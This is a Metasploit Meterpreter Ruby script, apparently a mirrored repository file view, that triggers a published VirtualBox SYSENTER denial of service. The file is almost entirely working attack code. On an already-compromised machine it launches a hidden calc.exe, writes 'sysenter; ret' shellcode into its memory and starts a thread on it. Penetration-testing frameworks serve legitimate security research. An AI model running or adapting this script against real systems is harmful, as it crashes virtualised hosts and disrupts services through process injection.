mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
50aa304692
git-svn-id: file:///home/svn/framework3/trunk@7362 4d416f70-5f16-0410-b530-b9f4589650da
44 lines
1.1 KiB
Ruby
44 lines
1.1 KiB
Ruby
# $Id$
|
|
|
|
# Meterpreter script for triggering the VirtualBox DoS published at:
|
|
# http://milw0rm.com/exploits/9323
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false,"Help menu." ]
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
print_line("virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323")
|
|
print_line("USAGE: run virtualbox_sysenter_dos")
|
|
print_status(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
}
|
|
|
|
|
|
# Spawn calculator
|
|
pid = client.sys.process.execute("calc.exe", nil, {'Hidden' => 'true'}).pid
|
|
print_status("Calculator PID is #{pid}")
|
|
|
|
calc = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
|
|
|
# Allocate some memory
|
|
mem = calc.memory.allocate(32)
|
|
|
|
print_status("Allocated memory at address #{"0x%.8x" % mem}")
|
|
|
|
# Write the trigger shellcode
|
|
# sysenter
|
|
# ret
|
|
calc.memory.write(mem, "\x0f\x34\xc3")
|
|
|
|
print_status("VirtualBox SYSENTER Denial of Service launching...")
|
|
|
|
# Create a new thread on the shellcode pointer
|
|
calc.thread.create(mem, 0)
|
|
|
|
print_status("VirtualBox SYSENTER Denial of Service delivered.")
|
|
|